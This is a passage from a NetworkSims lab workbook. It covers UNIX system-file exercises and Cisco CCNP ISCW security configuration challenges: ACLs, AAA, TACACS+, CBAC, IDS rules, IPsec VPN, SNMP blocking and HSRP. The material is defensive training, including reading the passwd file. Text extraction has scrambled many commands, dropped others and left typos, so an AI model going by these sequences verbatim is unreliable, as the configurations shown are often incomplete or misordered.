3 Enter the cat passwd command, and determine its contents.
4 Enter the cat protocols command, and determine its contents.
5 Enter the cat rpc command, and determine its contents.
6 Enter the cat services command, and determine its contents.
7 Enter the cat aliases command, and determine its contents.
8 Enter the cat mnttab command, and determine its contents.
NetworkSims.com
730

9 Enter the cat inetd.conf command, and determine its contents.
Showing open connections
As with Microsoft Windows, the netstat command can be used to view the currently open
ports.
1 Enter the netstat command.
List some of the open ports, for both the source and the destination.
/usr/sbin
Many important commands are located in /usr/sbin
1 Go to the /usr/sbin directory with cd /, cd usr, cd sbin.
2 Enter the ls command, and determine its contents.
NDS configuration
Novell NDS is used in many large organisation networks, and will often require to be linked
with UNIX.
1 Go to the /etc directory.
2 Enter the cat nds.conf command, and determine its contents.
File type display
The file command can be used to determine the type of a file.
1 Go to the /etc directory.
2 Enter the file * command, and determine the listing
List some of the file types.
Netmasks and networks
NetworkSims.com
731
The netmasks command can be used to setup the default netmask

1 Go to the /etc directory with cd /etc.
2 Enter the cat netmasks command, and determine the listing
3 Enter the cat networks command, and determine the listing
Netstat
1 Enter the netstat command.
List some of the open ports, for both the source and the destination.
2 Enter the netstat -i command to list information on the interfaces.
List the information given.
3 Enter the netstat -nr command to list the routing table.
4 Enter the netstat -m command to show the buffers.
5 Enter the netstat -s command to show protocol summaries.
DHCP files
DHCP allows nodes to be allocated IP addresses based on their MAC address.
1 Go into the /var folder with cd /var
2 Go into the /var/dhcp folder with cd dhcp
List the files in this folder.
3 Enter the cat dhcptab command, to list the contents of dhcptab
Outline its contents
4 Enter the cat 152_10_6_0 command, to list the contents of 152_10_6_0
Outline its contents
NetworkSims.com
732
Other supported commands:

cat release
cat printers.conf
cat resolv.conf
cat vfstab
NetworkSims.com
733
16 CCNP ISCW
Outline
Objectives

Enable the E0 port.
Example
> enable
# config t
(config)# int e0
(config-if)# description testing123
(config-if)# duplex half
(config-if)# end

Outline
Objectives
NetworkSims.com
734

Setup an ACL to permit everything else.
Apply it on the incoming port of E0.
Example
> en
# config t
2
2
2
2
2
permit host 130.152.162.10

deny host 193.68.36.8
permit 207.182.133.0 0.1.255.255
deny 153.246.194.0 0.0.127.255
permit any
(config)# int e0

Outline
Objectives

Setup an ACL to deny everything else.
Apply it on the incoming port of S0.
Example
> en
# config t
2
2
2
2
2
permit host 130.152.162.10

deny host 193.68.36.8
permit 207.182.133.0 0.1.255.255
deny 153.246.194.0 0.0.127.255
deny any
(config)# int s0
NetworkSims.com
735

Outline
Objectives
Define an extended ACL.

Define a host to be allowed.
Define a host to be denied.
Define a network to be allowed.
Define a network to be denied.
Permit everything else.
Apply ACL onto E0.
Example
> en
# config t
deny
permit
remark
ahp
eigrp
esp
gre
icmp
igmp
igrp
ip
ipinip
IP in IP tunneling
nos
ospf
pcp
pim
tcp
udp
(config)# access-list 105 permit tcp host 208.89.101.4 host 41.153.91.2 eq ftp
(config)# access-list 105 deny tcp host 197.119.92.8 host 144.98.220.6 eq ftp
255.255.255.0 eq ftp
NetworkSims.com
105
permit
tcp
100.120.83.0
255.255.255.0
71.252.23.0
736
255.255.255.0 eq ftp
105
deny
tcp
35.208.170.0
255.255.255.0
184.124.8.0

deny
permit
remark
(config)# access-list 105 permit tcp
any
Any source host
host
(config)# access-list 105 permit tcp any ?
any
eq
gt
host
lt
neq
range
(config)# int e0

Outline
This challenge involves the configuration of named ACLs.
Objectives
Define a named standard ACL.

Define a named extended ACL.
Example
> en
# config t
(config)# ip access-list ?
extended
Extended Access List
log-update Control access list log updates
logging
Control access list logging
standard
Standard Access List
(config)# ip access-list standard
<1-99> Standard IP access-list number
WORD
Access-list name
(config)# ip access-list standard leeds
(config-std-nacl)# deny ?
NetworkSims.com
737
any
Any source host
host
(config-std-nacl)# deny host 193.34.245.4
(config-std-nacl)# permit host 16.21.50.10
(config-std-nacl)# deny 18.223.156.0 0.15.255.255
(config-std-nacl)# permit 139.32.80.0 0.15.255.255
(config-std-nacl)# exit
(config)# int s0
(config-if)# ip access-group ?
<1-199>
WORD
Access-list name
(config-if)# ip access-group leeds in
(config-if)# exit
(config)# ip access-list extended tennessee
(config-ext-nacl)# deny ?
ahp
eigrp
esp
gre
icmp
igmp
igrp
ip
ipinip
IP in IP tunneling
nos
ospf
pcp
pim
tcp
udp
(config-ext-nacl)# deny tcp host 198.89.74.1 host 208.177.41.6 eq telnet
(config-ext-nacl)# permit tcp host 205.198.245.6 host 202.226.135.3 eq telnet
(config-ext-nacl)# deny tcp 54.83.187.0 255.255.255.0 101.167.107.0 255.255.255.0
eq telnet
(config-ext-nacl)# permit tcp 56.248.48.0 255.255.255.0 138.236.218.0 255.255.255.0
eq telnet
(config-ext-nacl)# exit
(config)# int s1
(config-if)# ip access-group tennessee in

Outline
Objectives
Define AAA.
NetworkSims.com
738
Example
> enable
# config t

Outline
Objectives
Define AAA.
Example
> enable
# config t
attribute
authorization
challenge-noecho
Access-Challenge
configure-nas
deadtime
directed-request
domain-stripping
host
key
local
password
retransmit
timeout
unique-ident
vsa
(config)# aaa ?
NetworkSims.com
739
accounting
authentication
authorization
configuration
nas
new-model

Authentication configurations parameters.
OLD commands.)
processes
arap
banner
enable
fail-message
login
nasi
ppp
WORD
enable
group
Use Server-group
line
local
none
NO authentication.
arap
banner
enable
fail-message
login
nasi
ppp
WORD
commands
exec
network
reverse-access
WORD
enable
group
Use Server-group
line
local
NetworkSims.com
740


Outline
Objectives
Define AAA.
Example
> enable
# config t

Outline
Objectives
Define AAA.
Define privileges.
Example
> enable
NetworkSims.com
741
# config t
Explanation

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where

Reset functions
Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
Thus:
NetworkSims.com
742


Outline
Objectives

Example
> enable
# config t
password bert
nopassword
privilege 15
privilege 1
user-maxlinks 2
access-class 9
Explanation

access-enable
clear
connect
disable
NetworkSims.com

Reset functions
743
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where

Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
Thus:

Outline
Objectives
Define Tacacs+.
NetworkSims.com
744
Example
> enable
# config t

Outline
This challenge involves the configuration of security of a switch based on 802.1x.
Objectives
Define AAA.
Define port authentication.
Example
> enable
# config t
(config)# aaa authentication dot1x default group radius
(config)# int fa0/1
(config-if)# exit
(config)# exit
# sh dot1x all
Sysauthcontrol
= Disabled
Dot1x Protocol Version
= 1
Dot1x Oper Controlled Directions = Both
Dot1x Admin Controlled Directions = Both
# sh dot1x all
Dot1x Info for interface FastEthernet0/1
---------------------------------------------------Supplicant MAC <Not Applicable>
AuthSM State
= N/A
BendSM State
= N/A
PortStatus
= N/A
MaxReq
= 2
HostMode
= Single
NetworkSims.com
745
Port Control
= Auto
QuietPeriod
= 60 Seconds
Re-authentication = Disabled
ReAuthPeriod
= 3600 Seconds
ServerTimeout
= 30 Seconds
SuppTimeout
= 30 Seconds
TxPeriod
= 30 Seconds
Guest-Vlan
= 0
# sh dot1x stat interface fa0/1
PortStatistics Parameters for Dot1x
-------------------------------------------TxReqId = 0
TxReq = 0
TxTotal = 0
RxStart = 0
RxLogoff = 0
RxRespId = 0
RxInvalid = 0
RxLenErr = 0
RxTotal= 0
RxVersion = 0
LastRxSrcMac 0000.0000.0000
RxResp = 0

Outline
This challenge involves the configuration of a priority group and route-cache.
Objectives
Define an access-list.
Define an priority-group.
Define a route-cache.
Example
> en
# config t
<1-99>
<100-199>
<1000-1099>
IPX SAP access list
<1100-1199>
<1200-1299>
IPX summary address access list
<1300-1999>
<200-299>
<2000-2699>
<700-799>
<800-899>
IPX standard access list
<900-999>
IPX extended access list
dynamic-extended Extend the dynamic ACL abolute timer
rate-limit
Simple rate-limit specific access list
deny
NetworkSims.com
746

permit
remark
(config)# access-list 105 permit tcp host 144.93.24.10 host 131.33.204.2 eq dns
(config)# access-list 105 deny tcp host 154.31.216.9 host 26.100.164.1 eq dns
255.255.0.0 eq dns
(config)# access-list 105 deny tcp 102.65.178.0 255.255.0.0 5.101.146.0 255.255.0.0
eq dns
(config)# access-list 105 permit ip ?
any
Any source host
host
(config)# access-list 105 permit ip any
any
eq
gt
host
lt
neq
range
(config)# int e0
(config)# exit
(config)# priority-list 1 protocol ?
arp
IP ARP
bridge
Bridging
cdp
ip
IP
ipx
Novell IPX
llc2
llc2
pad
PAD links
snapshot
(config)# priority-list 1 protocol ip ?
high
medium
normal
low
(config)# priority-list 1 protocol ip high ?
gt
Prioritize packets greater than a specified size
list
lt
Prioritize packets less than a specified size
tcp
udp
<cr>
(config)# priority-list 1 protocol ip high list ?
<1-199>
IP access list
(config)# priority-list 1 protocol ip high list 105
(config)# int e0
(config-if)#priority-group ?
<1-16> Priority group
(config-if)#priority-group 1
(config-if)# ip route-cache ?
cef
Enable Cisco Express Forwarding
flow
Enable Flow fast-switching cache
policy
Enable fast-switching policy cache for outgoing packets
same-interface Enable fast-switching on the same interface
<cr>
NetworkSims.com
747
(config-if)# ip route-cache
(config-if)# int e1

Outline
This challenge involves the configuration of services on the router.
Objectives
Define encrypted passwords.

Define timestamps.
Disable TCP small services.
Disable UDP small services.
Example
> en
# config t
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in

Enable PAD commands
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
log
<cr>
NetworkSims.com
748

uptime
<cr>
(config)# sequence-numbers ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
Enable PAD commands
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers

Outline
Objectives
Define AAA details.
Example
> en
# config t
NetworkSims.com
749
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
aaa
aaa
aaa
aaa
aaa
aaa
aaa
new-model
authen loging def radius
authen ppp def radius
author network default radius
author exec default radius

Outline
This challenge involves the configuration of Tacacs+.
Objectives
Setup of Tacacs+.
Example
> en
# config t
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
new-model
authen loging def tacacs+
authen ppp def tacacs+
author network default tacacs+
author exec default tacacs+

Outline
This challenge involves the configuration of restrictions on the local HTTP server.
Objectives
Setup an ACL to permit a single host.

Apply ACL to restrict access to the HTTP server to only one host.
Example
NetworkSims.com
750
> en
# config t
(config)# ip http ?
access-class
path
port
HTTP port
server
Enable HTTP server

Outline
This challenge involves the configuration of the HTTP server which denies a single host.
Objectives
Setup an ACL which denies a single host.

Apply the ACL to deny the host access to the HTTP server.
Example
> en
# config t

Outline
This challenge involves the configuration of permiting a single host access to the Telnet
server.
Objectives
NetworkSims.com
751
Setup an ACL to allow a single host access.

Apply the ACL to the Telnet server so that only a single host can get access.
Example
> en
# config t
(config-line)# access-class ?
<1-199>
IP access list
WORD
Access-list name
(config-line)# access-class 1 ?
in
(config-line)# access-class 1 in

Outline
This challenge involves the configuration to deny a single host access to the Telnet server.
Objectives
Setup an ACL to deny a single host access.

Apply the ACL to the Telnet server so that only a single host cannot get access.
Example
> en
# config t

NetworkSims.com
752
Outline
This challenge involves the configuration of IP Inspect.
Objectives
Setup limits for the number of connections over one-minute.

Setup limits for the number of open connections.
Define SYN waits.
Example
> en
# config t
(config)# ip inspect ?
alert-off
Disable alert
audit-trail
Enable the logging of session information (addresses and
bytes)
dns-timeout
Specify timeout for DNS
max-incomplete Specify maximum number of incomplete connections before
clamping
name
Specify an inspection rule
one-minute
Specify one-minute-sample watermarks for clamping
tcp
Config timeout values for tcp connections
udp
Config timeout values for udp flows
<cr>
(config)# ip inspect one-minute ?
high Specify high-watermark for clamping
low
Specify low-watermark for clamping
(config)# ip inspect one-minute low 360
(config)# ip inspect one-minute high 410
(config)# ip inspect max-incomplete low 720
(config)# ip inspect max-inomplete high 770
(config)# ip inspect dns-timeout 1
(config)# ip inspect tcp ?
finwait-time
Specify timeout for TCP connections after a FIN
idle-time
Specify idle timeout for tcp connections
max-incomplete Specify max half-open connection per host
synwait-time
Specify timeout for TCP connections after a SYN and no
further data
(config)# ip inspect tcp synwait-time ?
(config)# ip inspect tcp synwait-time 35
(config)# ip inspect tcp finwait-time 5
(config)# ip inspect tcp max-incomplete ?
host Specify max half-open connection per host
(config)# ip inspect tcp max-incomplete host 800
finwait-time
idle-time
synwait-time
further data
(config)# ip inspect tcp idle-time 70
NetworkSims.com
753
(config)# ip inspect udp idle-time 57

Outline
This challenge involves the configuration of a context based access-list (CBAC).
Objectives
Setup a CBAC.
Define the protocols which the CBAC applies to.
Example
> en
# config t
(config)# int fa0/0
(config-if)# exit
(config)# ip inspect name cisco ?
cuseeme
CUSeeMe Protocol
fragment
IP fragment inspection
ftp
File Transfer Protocol
h323
H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
http
HTTP Protocol
netshow
Microsoft NetShow Protocol
rcmd
R commands (r-exec, r-login, r-sh)
realaudio
Real Audio Protocol
rpc
Remote Prodedure Call Protocol
rtsp
Real Time Streaming Protocol
smtp
Simple Mail Transfer Protocol
sqlnet
SQL Net Protocol
streamworks StreamWorks Protocol
tcp
tftp
TFTP Protocol
udp
vdolive
VDOLive Protocol
(config)# ip inspect name cisco tcp
(config)# ip inspect name cisco udp
(config)# ip inspect name cisco ftp
(config)# ip inspect name cisco sqlnet
(config)# int e0
(config-if)#ip inspect ?
WORD Name of inspection defined
(config-if)#ip inspect cisco
(config-if)#ip inspect cisco in
(config-if)# exit
(config)# access-list 106 deny ip any any
(config)# int s0
NetworkSims.com
754
Explanation
ACLs are fairly static in their operation, and they do not take into account the context of a
data packet. Thus they cannot detect the actual state of a connection. A typical type of attack
in a system is DoS (Denial-of-Service), which is caused when multiple remote clients make
access to the same server. Knowing the context of a data packet, or its associated connection
thus allows finer control of the security of the system. For example in a DoS the firewall
could detect that the number of connections in a given time limit had exceeded a given
number, and block any other ones, within a given time. Context-based Access Control
(CBAC) are thus stateful, and dynamic, and can look further into packets than normal
ACLs. In client-server communications the key states in most connections are:
Client sends a SYN flag to the server.

The server responds with a SYN, ACK to the client.
The client responds with an ACK, and the connection is made.
The client and server then communicate.
The client sends a FIN, ACK flag.
The server sends an ACK flag, and the connection is finished.
Context-based Access Control is used to implement firewall options, such as limiting the
number of open connections. A typical attack is the DoS (Denial of Service) attack, where
the external party opens up multiple connections. To overcome this, the router can be setup
to detect a minimum threshold for half-open sessions. The half-open session is where either
the client or server quits the session without the other side knowing about it. In a DoS, the
client opens a connection, and does not complete it. The server does not know that the client
has disconnected, thus the connection still takes some resources on the server, which can
become overburdened if there are many open sessions. On the Napier pods, use Pod C
(Router 1) for an example of router which implements these CBACs.
Global timeouts and thresholds
The main limits that are defined are:
ip inspect tcp synwait-time. This defines the time to wait before a connection drops.
Default: 30 seconds.
ip inspect tcp finwait-time. This defined the time after a FIN flag for a connection to be
dropped. Default: 5 seconds.
ip inspect tcp idle-time. This defines the length of time that a connection can be idle.
Default: 1 hour.
ip inspect dns-time. This defines the amount of time of a time-out for a DNS query.
Default: 5 seconds.
ip inspect max-incomplete high. This defines the maximum number of half-open
connections, before it starts to delete them one-by-one. Default: 500.
NetworkSims.com
755
ip inspect max-incomplete low. This defines the lower limit for the half-open
connections. Default: 400.
ip inspect one-minute high. This defines the maximum number of half-open
connections in a minute, before it starts to delete them one-by-one. Default: 500 per
minute.
ip inspect one-minute low. This defines the lower limit for the half-open connections
over a minute. Default: 400.
For example to limit the maximum open sessions at any time to between 900 and 1100:
alert-off
Disable alert
audit-trail
bytes)
dns-timeout
clamping
name
one-minute
tcp
udp
<cr>
finwait-time
idle-time
synwait-time
further data
(config)# ip inspect max-incomplete high 1100
and for the maximum open sessions for one-minute:

get rid of IP inspect, use:

(config)# no ip inspect one-minute low
To limit the DNS-timeout to 10 seconds:


Outline
This challenge involves the configuration of a port map.
Objectives
NetworkSims.com
756
Define the port-mapping for various protocols.
Example
> en
# config t
(config)# ip port-map http port 1126
(config)# ip port-map ftp port 1188
(config)# ip port-map smtp port 1897
(config)# ip port-map telnet port 1189
(config)# exit
# show ip port-map
Default mapping: vdolive
port
Default mapping: sunrpc
port
Default mapping: netshow
port
Default mapping: cuseeme
port
Default mapping: tftp
port
Default mapping: rtsp
port
Default mapping: realmedia
port
Default mapping: streamworks
port
Default mapping: ftp
port
Default mapping: telnet
port
port
Default mapping: h323
port
Default mapping: sip
port
Default mapping: smtp
port
Default mapping: http
port
Default mapping: msrpc
port
Default mapping: exec
port
Default mapping: login
port
Default mapping: sql-net
port
Default mapping: shell
port
Default mapping: mgcp
port
port
port
port
port
7000
111
1755
7648
69
8554
7070
1558
21
23
554
1720
5060
25
80
135
512
513
1521
514
2427
1126
1188
1897
1189
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
user defined
user defined
user defined
user defined
Explanation
Many ports are well-known on the Internet, such as port 23 for Telnet and port 80 for HTTP.
In many situations the port mapping to the protocol is not always standard, such as HTTP
using port 8080. The ip port-map command can be used to remap ports to their application.
An example of the command is:
(config) # ip port-map ?
cuseeme
CUSeeMe Protocol
dns
Domain Name Server
exec
Remote Process Execution
finger
Finger
ftp
gopher
Gopher
h323
http
Hypertext Transfer Protocol
imap
Internet Message Access Protocol
kerberos
Kerberos
ldap
Lightweight Directory Access Protocol
login
Remote login
NetworkSims.com
757
lotusnote
mgcp
ms-sql
msrpc
netshow
nfs
nntp
pop2
pop3
realmedia
rtsp
sap
shell
sip
smtp
snmp
sql-net
streamworks
sunrpc
sybase-sql
tacacs
telnet
tftp
vdolive
Lotus Note
Media Gateway Control Protocol
Microsoft SQL
Microsoft Remote Procedure Call
Microsoft NetShow
Network File System
Network News Transfer Protocol
Post Office Protocol - Version 2
Post Office Protocol - Version 3
RealNetwork's Realmedia Protocol
SAP
Remote command
Session Initiation Protocol
Simple Network Management Protocol
SQL-NET
StreamWorks Protocol
SUN Remote Procedure Call
Sybase SQL
Login Host Protocol (TACACS)
Telnet
Trivial File Transfer Protocol
VDOLive Protocol
So, for example, to map HTTP to port 8080:

(config) # ip port-map http port 8080
Then to show the port mapping:

# show ip port-map
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
7000
111
1755
7648
69
8554
7070
1558
21
23
8080
554
1720
5060
25
80
135
512
513
1521
514
2427
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
user defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
# show ip port-map http

port 8080
port 80
user defined
system defined

Outline
NetworkSims.com
758
This challenge involves the configuration of an audit trail.

Objectives
Setup logging.
Define an audit-trail.
Example
> en
# config t
(config)# logging ?
buffered
cns-events
console
count
exception
facility
history
host
Set syslog server host name or IP address
monitor
on
rate-limit
source-interface
transactions
trap
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
(severity=6)
warnings
Warning conditions
(severity=4)
<cr>
(config)# logging trap warning
(config)# logging monitor warning
(config)# logging console warning
<0-7>
alerts
critical
Critical conditions
debugging
Debugging messages
emergencies
System is unusable
errors
Error conditions
NetworkSims.com
(severity=1)
(severity=2)
(severity=7)
(severity=0)
(severity=3)
759
informational
(severity=6)
notifications
warnings
Warning conditions
(severity=4)
<cr>
(config)# logging buffer warnings
(config)# ip inspect audit-trail
(config)# no ip inspect alert-off

Outline
This challenge involves the configuration to deny an incoming SYN packet.
Objectives
Apply an extended ACL which detects the SYN packet.
Example
> en
#config t
(config)# access-list 107 deny tcp any any ?
ack
Match on the ACK bit
dscp
Match packets with given dscp value
eq
established Match established connections
fin
Match on the FIN bit
fragments
Check non-initial fragments
gt
log
log-input
Log matches against this entry, including input interface
lt
neq
precedence
Match packets with given precedence value
psh
Match on the PSH bit
range
rst
Match on the RST bit
syn
Match on the SYN bit
time-range
Specify a time-range
tos
Match packets with given TOS value
urg
Match on the URG bit
<cr>
(config)# access-list 107 deny tcp any any established
(config)# int s0
<1-199>
WORD
Access-list name
in
inbound packets
NetworkSims.com
760


Outline
This challenge involves the configuration of an authentication proxy.
Objectives
Define AAA.
Setup an authentication proxy.
Example
> en
# config t
(config)# ip http ?
access-class
path
port
HTTP port
server
Enable HTTP server
aaa
Use AAA access control methods
local
(config)# ip http authentication aaa
(config)# ip auth-proxy ?
auth-cache-time
Authorization Cache Timeout in min
auth-proxy-audit
Authentication Proxy Auditing
auth-proxy-banner Authentication Proxy Banner
name
Specify an Authentication Proxy Rule
<cr>
(config)# ip auth-proxy auth-cache-time ?
(config)# ip auth-proxy auth-cache-time 45
(config)# ip auth-proxy name yellow http
(config)# int fa0
(config-if)# ip auth-proxy ?
WORD Name of authenticaion proxy rule
(config-if)# ip auth-proxy yellow
(config-if)# exit
# show ip auth-proxy configuration
NetworkSims.com
761
# sh ip auth-proxy config
Authentication global cache time is 40 minutes

Authentication Proxy Rule Configuration
Auth-proxy name testing
http list not specified auth-cache-time 40 minutes

Outline
This challenge involves the configuration of IDS rules.
Objectives
Setup IDS rules.

Define a SPAM filter.
Example
> en
# config t
(config)# ip
attack
info
name
notify
audit ?
Specify default action for attack signatures
Specify default action for informational signatures
Specify an IDS audit rule
Specify the notification mechanisms (nr-director or log) for the
alarms
po
Specify nr-director's PostOffice information (for sending events
to the nr-directors
signature Add a policy to a signature
smtp
Specify SMTP Mail spam threshold
(config)# ip audit notify ?
log
Send events as syslog messages
nr-director Send events to the nr-director
(config)# ip audit notify log
(config)# ip audit ?
attack
info
name
notify
alarms
po
to the nr-directors
smtp
(config)# ip audit info ?
action Specify the actions
(config)# ip audit info action ?
NetworkSims.com
762
alarm Generate events for matching signatures

drop
Drop packets matching signatures
reset Reset the connection (if applicable)
(config)# ip audit info action drop
(config)# ip audit attack action reset
(config)# ip audit signature ?
<1-65535> Signature to be configured
(config)# ip audit signature 1005 disable
(config)# ip audit smtp ?
spam Specify the threshold for spam signature
<cr>
(config)# ip audit smtp spam ?
<1-65535> Threshold of correspondents to trigger alarm
(config)# ip audit smtp spam 4

Outline
This challenge involves setting up IKE for a VPN connection.
Objectives
Define the IKE policy.

Define encryption.
Define hash function.
Define authentication type.
Define identity type.
Define authentication key and address (for pre-share authentication).
Define the transform set.
Example
> en
# config t
(config)# crypto
(config)# crypto
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config)# crypto
(config)# crypto
(config)# crypto
isakmp enable
isakmp policy 111
encryption des
hash sha
group 1
exit
ipsec transform-set test esp-des
NetworkSims.com
763

Outline
Objectives

Define IKE.
Show the tunnel details.
Example
> en
# config t
136.163.130.0 0.0.255.255
(config-isakmp)# ?
ISAKMP commands:
authentication Set authentication method for protection suite
default
encryption
Set encryption algorithm for protection suite
exit
Exit from ISAKMP protection suite configuration mode
group
Set the Diffie-Hellman group
hash
Set hash algorithm for protection suite
lifetime
Set lifetime for ISAKMP security association
no
(config-isakmp)# en ?
3des Three key triple DES
aes
AES - Advanced Encryption Standard.
des
DES - Data Encryption Standard (56 bit keys).
(config-isakmp)# hash ?
md5 Message Digest 5
sha Secure Hash Standard
(config-isakmp)# authentication ?
pre-share Pre-Shared Key
NetworkSims.com
764
rsa-encr
Rivest-Shamir-Adleman Encryption
rsa-sig
Rivest-Shamir-Adleman Signature
(config-isakmp)# g ?
1 Diffie-Hellman group 1
(config-crypto-map)# ?
Crypto Map configuration commands:
default
description
Description of the crypto map statement policy
dialer
Dialer related commands
exit
Exit from crypto map configuration mode
match
Match values.
no
qos
Quality of Service related commands
reverse-route Reverse Route Injection.
set
Set values for encryption/decryption
Router(config-crypto-map)# match ?
address Match address of packets to encrypt.
Router(config-crypto-map)# match address ?
<100-199>
IP access-list number
<2000-2699> IP access-list number (expanded range)
WORD
Access-list name
(config-crypto-map)# match address 109
(config-crypto-map)# set ?
identity
Identity restriction.
isakmp-profile
Specify isakmp Profile
peer
Allowed Encryption/Decryption peer.
pfs
Specify pfs settings
security-association Security association parameters
transform-set
Specify list of transform sets in priority order
(config-crypto-map)# set peer 144.55.62.1
(config-crypto-map)# set transform-set ?
WORD Proposal tag
(config-crypto-map)# set transform-set finland
(config-crypto-map)# set pfs group1
(config-crypto-map)# exit
(config)# int e0
(config-if)# crypto map Manchester
(config-if)# exit
(config)# exit
# show crypto ipsec sa
interface: E0
Crypto map tag: Manchester, local addr 192.168.1.1
protected vrf: (none)
NetworkSims.com
765
local ident (addr/mask/prot/port): (50.93.0.0/255.255.0.0/0/0)

remote ident (addr/mask/prot/port): (136.163.0.0/255.255.0.0/0/0)
current_peer 192.168.1.1 port 500
PERMIT, flags={origin_is_acl,}
#pkts encaps: 43, #pkts encrypt: 43, #pkts digest: 43
#pkts decaps: 43, #pkts decrypt: 43, #pkts verify: 43
#pkts compressed: 0, #pkts decompressed: 0
#pkts not compressed: 0, #pkts compr. failed: 0
#pkts not decompressed: 0, #pkts decompress failed: 0
#send errors 4, #recv errors 0
local crypto endpt.: 192.168.1.1, remote crypto endpt.: 144.55.62.1
path mtu 1500, ip mtu 1500, ip mtu idb E0
current outbound spi: 0x267BC43(40352835)
inbound esp sas:
spi: 0xD9F4BC76(3656694902)
transform: esp-des
in use settings ={Tunnel, }
conn id: 2001, flow_id: SW:1, crypto map: Manchester
sa timing: remaining key lifetime (k/sec): (4558868/3550)
IV size: 8 bytes
replay detection support: Y
Status: ACTIVE
inbound ah sas:
inbound pcp sas:
outbound esp sas:
spi: 0x267BC43(40352835)
transform: esp-des
IV size: 8 bytes
Status: ACTIVE
outbound ah sas:
outbound pcp sas:
# show crypto isakmp sa
dst
src
144.55.62.1
192.168.1.1
state
QM_IDLE
conn-id slot
1
0
status
ACTIVE

Outline
NetworkSims.com
766
Objectives

Example
> en
# config t
61.222.47.2
61.222.47.2
61.222.47.2 eq isakmp
london
london
london
london
(config)# int e0

Outline
This challenge involves blocking SNMP.
Objectives
Define an access-list to block SNMP.

Disable SNMP-server commands.
Example
NetworkSims.com
767
> en
# config t
(config)# access-list 110 deny udp any any eq snmp
(config)# int e0
(config-if)# exit
(config)# no snmp-server community annt RO
(config)# no snmp-server contact steven
(config)# no snmp-server location uk
(config)# no snmp-server host 78.113.70.11
(config)# no snmp-server enable traps
(config)# no snmp-server chassis-ID paris

Outline
This challenge involves manually configuring RSA keys for peers.
Objectives
Define the public key for a given host.

Specify the key.
Example
> en
# config t
(config)# cryto key pubkey-chain rsa
(config-pubkey-chain)# addressed-key 142.217.4.10
(config-pubkey-key)# key-string 01234567 01234567
NetworkSims.com
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
0123
768
(config-pubkey-key)# exit
(config-pubkey-chain)# exit
(config)# exit
# show crypto key pubkey rsa

Outline
Objectives
Define EIGRP.
Example
# config t
(config-if)# exit
Router Challenge 124: SSH Explained

NetworkSims.com
769

Explanation
ap# config t
End with CNTL/Z.

Key Data:
305C300D 06092A86 4886F70D 01010105
F1499B01 49C485A2 20C9FB37 8CD11053
32020F80 910AFBCC 6D402F90 96E8A59B
Key Data:
307C300D 06092A86 4886F70D 01010105
312319CA 0E919F76 72D2D5A9 36B4710C
D07C0000 832F6A1C 81411423 BE52CBF4
AE8EFA46 282AEC54 F0909F82 466A19DD
UTC Mar 1 2002
00034B00 30480241 00DDD8C6 4B744520

039D344B 3C5BD55E E84E17C8 FD62DA08
40467A3E 8FEED18B B1020301 0001
UTC Mar 1 2002
00036B00
CC4DE0C4
ECBE417E
EBEFAEDE
30680261
080D2B47
1C3C09D1
7B4B992F
00B435A4
55970CA5
2BBC90DF
5F020301
C007251B
39F21170
8DA398DB
0001

To get rid of keys:
NetworkSims.com
770

Telnet sessions:
Router Challenge 127: HSPF

Outline: This challenge involves an analysis of HSPF.
Objectives: The objectives of this challenge are to explain HSPF.
Explanation
Cisco's Hot Standby Routing Protocol (HSRP) allows a router to provide a backup for
another. In HSRP, the backup router only monitors the other router. If it determines that the
active (monitored) router is not responding, it will take over.
ap# config t
ap (config)# int e0
ap (config-if)# ip address 10.0.0.1 255.0.0.0
(config-if)# standby ?
<0-255>
group number
delay
HSRP initialisation delay
ip
mac-address
Virtual MAC address
name
preempt
Overthrow lower priority Active routers
priority
Priority level
redirect
Configure sending of ICMP Redirect messages with an HSRP
virtual IP address as the gateway IP address
timers
track
Priority tracking
use-bia
HSRP uses interface's burned in address
version
HSRP version
ap (config-if)# standby 1 ip 10.0.0.2
ap (config-if)# standby 1 preempt
ap (config-if)# standby 1 priority 100
ap (config-if)# standby 1 authentication edinburgh
ap (config-if)# standby 1 timers 5 15
ap (config-if)# st ANY ?
ip
NetworkSims.com
771
mac-address
name
preempt
priority
timers
track
Virtual MAC address

Overthrow lower priority Active routers
Priority level
Priority tracking
ap (config-if)# st 1 au ?
WORD Plain text authentication string
md5
Use MD5 authentication
ap (config-if)# st 1 i ?
<cr>
ap (config-if)# st 1 m ?
H.H.H MAC address
ap (config-if)# st 1 n ?
WORD name string
ap (config-if)# st 1 pre ?
<cr>
ap (config-if)# st 1 pri ?
ap (config-if)# st 1 ti ?
msec
ap (config-if)# st 1 ti 1 ?
<2-255> Hold time in seconds
ap (config-if)# st 1
<1-500>
Async
BVI
CDMA-Ix
